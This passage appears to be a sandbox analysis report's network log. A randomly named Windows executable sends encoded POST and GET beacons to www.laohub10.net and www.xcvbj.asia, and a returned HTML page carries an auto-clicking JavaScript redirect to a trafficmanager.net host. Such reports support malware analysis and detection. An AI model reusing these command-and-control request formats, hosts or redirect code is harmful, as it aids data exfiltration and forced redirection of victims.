                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.64985427.124.4.24680768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:27:56.338972092 CET778OUTPOST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 6a 42 38 74 7a 56 51 42 2f 6a 61 47 4a 75 64 6d 51 74 2f 79 78 73 46 7a 51 70 44 31 34 34 67 4d 54 4e 46 55 69 35 31 76 61 64 7a 67 3d 3d
                                                          Data Ascii: b6=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGjB8tzVQB/jaGJudmQt/yxsFzQpD144gMTNFUi51vadzg==
                                                          Dec 3, 2024 23:27:57.694483995 CET525INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.64986027.124.4.24680768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:27:59.095851898 CET1791OUTPOST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 55 52 48 6d 37 6e 6b 68 44 67 34 31 6e 63 72 36 66 5a 64 30 54 70 53 46 70 6c 53 31 73 4a 34 7a 4a 46 46 47 51 67 46 48 31 41 77 63 7a 33 4d 30 66 57 2b 76 4c 4f 76 73 4d 66 4e 2f 75 75 52 6a 61 6a 6e 77 6b 32 77 37 42 70 5a 48 48 36 33 71 4e 6e 43 2f 34 44 6d 4d 55 2f 6c 4b 53 66 6a 78 63 4c 63 71 6a 38 34 44 4f 68 51 74 6c 43 6d 68 45 65 47 5a 42 46 50 2b 69 53 36 56 65 7a 55 6f 59 49 2b 78 36 55 43 58 6e 73 4a 55 74 46 32 6e 32 5a 53 54 31 47 76 74 68 35 38 71 4e 65 53 56 6c 73 72 78 67 [TRUNCATED]
                                                          Data Ascii: b6=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8cURHm7nkhDg41ncr6fZd0TpSFplS1sJ4zJFFGQgFH1Awcz3M0fW+vLOvsMfN/uuRjajnwk2w7BpZHH63qNnC/4DmMU/lKSfjxcLcqj84DOhQtlCmhEeGZBFP+iS6VezUoYI+x6UCXnsJUtF2n2ZST1Gvth58qNeSVlsrxguAKPQG69C0uQy9UKylVIUFpNYcf93MFxKIWTnLQ8VCI4PryojYy2lluIIESYrE6a4taxQeUKBUM983ztVzhapZ/0dwrTJphaZq+tKLU4kk1L0+xr+RaXqHYfB+j8vQaIj0nkiKAfqef3oLNV2oKQ0RdBmqWtZYQoo9GxGno1ZtRT9lKVUvh+5ELiUKgsBfSwQ4pE3yI4mubtAZ027M9XIjd5qT2b0sfP4QcPruNgXNZ9BoiMcVwEcMzxZg3FiSuZDh98PP06kT6uf5GJbxBLUVvTVhxyWwU+6s/BzfVlTaxKKTfjBaWtA/cxhOyF1tTkSpsDCUckz8EBhqc0QxDTS87/BIKO2IOvazStVBFHMNQz5okuWX+Ehe54tRs9sw1gIiPfTnz0pOMH3lDW5rxMufwC1mzF1VQ8SolEI1e8xYwYLC4oYdEJ2eSKzwybOIsKGqQQ2rncXH2ZKpKXmbSuGhPz9bmq6wCEnfw8xk9quaVdtyxgtgidCbZk2q44Xoqwn0UTnc3T8qFiVIdL9YupKyM8pPSqRZN2e3IgI/nLDHAo/UIRVwmnRFDzMvj9K/K9YNolQo310NgkgQ8NEXRI/PZTZS8CZllUnheh0UA2Myorh6CfaJoQUMT1ednu4cqGPfkHmERv1Aivhxv4XleXId6x4AiVArhjSa [TRUNCATED]
                                                          Dec 3, 2024 23:28:00.486567974 CET525INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.64986827.124.4.24680768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:01.763202906 CET504OUTGET /sgdd/?b6=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:28:03.208520889 CET525INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.649889149.88.81.19080768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:09.639137030 CET748OUTPOST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 6c 47 4a 4e 55 79 46 2b 6d 75 79 76 6d 68 68 7a 42 53 64 4d 63 33 4e 4b 36 55 76 66 69 4a 71 2f 4a 67 48 4f 42 75 2b 62 63 38 30
                                                          Data Ascii: b6=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJlGJNUyF+muyvmhhzBSdMc3NK6UvfiJq/JgHOBu+bc80
                                                          Dec 3, 2024 23:28:11.122781038 CET289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:10 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.649895149.88.81.19080768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:12.301398039 CET772OUTPOST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 58 50 4b 34 4d 64 66 43 4a 41 39 4a 59 48 63 57 69 5a 55 6f 5a 58 73 47 6b 39 52 72 7a 71 44 62 57 74 4c 54 64 79 41 72 5a 4c 6d 51 3d 3d
                                                          Data Ascii: b6=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMXPK4MdfCJA9JYHcWiZUoZXsGk9RrzqDbWtLTdyArZLmQ==
                                                          Dec 3, 2024 23:28:13.841598988 CET289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:13 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.649900149.88.81.19080768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:14.970340967 CET1785OUTPOST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 57 75 6f 30 52 57 31 78 2b 32 4a 38 50 6f 53 70 4d 76 51 32 51 79 33 4f 30 61 55 56 2b 47 63 4e 39 64 6c 78 59 59 56 49 53 4c 4f 34 54 43 55 57 73 79 4d 5a 41 50 78 6f 4a 63 65 6f 71 6d 4b 59 51 2f 6b 65 65 43 4e 6f 32 73 6f 44 46 72 37 64 64 39 76 76 4b 45 31 77 2b 31 4b 45 5a 4b 57 77 42 34 4f 76 43 37 4a 42 47 75 6f 30 35 7a 69 68 38 6c 6f 7a 41 67 38 64 6a 52 2b 58 6a 51 2b 68 6a 6d 51 47 33 71 31 4f 6e 55 52 61 46 54 37 4a 39 2b 71 63 2f 2f 66 6d 75 37 43 39 64 6c 6a 57 4b 6c 46 67 55 [TRUNCATED]
                                                          Data Ascii: b6=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3Wuo0RW1x+2J8PoSpMvQ2Qy3O0aUV+GcN9dlxYYVISLO4TCUWsyMZAPxoJceoqmKYQ/keeCNo2soDFr7dd9vvKE1w+1KEZKWwB4OvC7JBGuo05zih8lozAg8djR+XjQ+hjmQG3q1OnURaFT7J9+qc//fmu7C9dljWKlFgUdCecnyvSUvEV7rOugR6Ne/76HFEvgpQzpFH0Co86RhU/v4Q7Zdukddz8rvPNLxUhhjFXZZMm+qHK+i87NS/WkSz15Zz8d9ARliYg7hwVMcjm3UpAw47iMFr4D1pMbhoeI8jY1i+XbzVELMvDY2p6OFZ35O9EEvih98uooFaGwzU3FReIU8JO1c7BUjdDZFUqYrVOk2prsjUC+C/H6+SKqr5+qdEiJdfLn+Jw389ksZqc34U5GwDrTGI391J1vqBSHUvGVrMbklVk8iItWs6oMJ3uDH8u+qK2DrJhNxaHb9ivWT70TGiLvQ+ECCf6+haa6g9D5EKFAMNnA3UNeBMkahJGWOUxvKLmagwooX//jWgpiQ+vHs8ifReyvQAIUUBlJBwlBa+lEWA06z3TV1mKA1SUbECuTdSezX/A5OhlTaeMg3Q2O5g46hcFXI56SRo3FETuKpBbs0c0HE3bUaxVcDOp/yHgWNJkRMKNpYTxc53fcUUeLtZsn/4mtzSv/+Z6sByzS5Bl4Kp0CkYUCjctVKS7rxY+0rQ8dsiJyfTY7hAOp071dJVb12uBjVoSS6Hra+y7LgrLEjOit/QslJwYUMl3RJjjTv9oQsyO79+OPb7zyEEYVwnzPeS96Ga2DZCqaduNNLmWNY/B5d2pnl/I4VT8zEZsRbDCgL [TRUNCATED]
                                                          Dec 3, 2024 23:28:16.509211063 CET289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:16 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.649907149.88.81.19080768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:17.637489080 CET502OUTGET /rq1s/?b6=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:28:19.293936014 CET289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
